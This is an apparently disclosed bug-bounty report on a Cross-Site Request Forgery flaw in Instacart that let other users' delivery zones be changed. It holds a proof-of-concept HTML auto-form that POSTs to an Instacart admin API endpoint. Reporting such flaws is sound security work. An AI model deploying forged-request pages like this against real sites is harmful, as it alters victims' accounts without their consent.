Instacart: Cross-Site Request Forgery (CSRF)

2016-08-09T21:52:49
ID H1:157993
Type hackerone
Reporter malcolmx
Modified 2016-10-13T20:21:53

Description

Hello,

i found Cross-Site Request Forgery (CSRF) that can change any user ZONE

POC:

``` <html> <body> <form action="https://admin.instacart.com/api/v2/zones" method="POST"> <input type="hidden" name="zip" value="10001" /> <input type="hidden" name="override" value="true" /> <input type="submit" value="Submit request" /> </form> </body> </html>

``` put Zone you want send the request to any user and you will change his Zone

Please Watch My POC I Attached For More Details Thanks